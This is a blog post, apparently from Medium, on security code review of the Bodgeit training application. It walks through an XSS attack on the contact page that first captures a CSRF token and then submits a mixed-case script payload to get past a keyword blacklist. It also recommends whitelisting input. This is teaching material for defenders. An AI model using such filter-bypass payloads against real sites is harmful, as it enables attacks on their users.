AppSec-Code Review & Python automation-story-2

This is the sequel of python automation which I had posted earlier. In last blog, I had explained about how to install bodge open-source application and perform source code review.Please go though my previous blog to follow this up.

XSS attack in contact page

As part of this attack, XSS attack is going to be performed. The vulnerability has been clearly explained in below URL. Since, we are not focusing on process of finding the vulnerability, it was not explained as part of this blog.I kindly request you to have a look at below for betting understanding of the vulnerability.

In order to perform the attack below attributes are required.

  • CSRF token for sending along with POST request
  • Payload for performing XSS attack

Steps to reproduce

  1. Enter the application URL in address bar and go to contact page
contact page loaded

2. Capture the CSRF token from server response

3. Inject the payload along with CSRF token for successful XSS attack

<sCriPt>alert(‘xss’)</ScRiPt>

Secure code review

contact.jsp

In “contact.jsp” page, the application is looking for comments from user and eliminated keywords <script> and </script> from the input in order to avoid the XSS attack. However the black listing the input is not strong enough to protect the application. It is always recommended to allow white-listed input rather than black-listing the inputs.

Due to poor black-listing of the input, the attacker is able to perform the xss attack here.

Python code

python script

As discussed earlier, CSRF token from server is captured initially and then it is fed to server along with XSS payload. I have added the description in the code for better understanding.

Python output

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store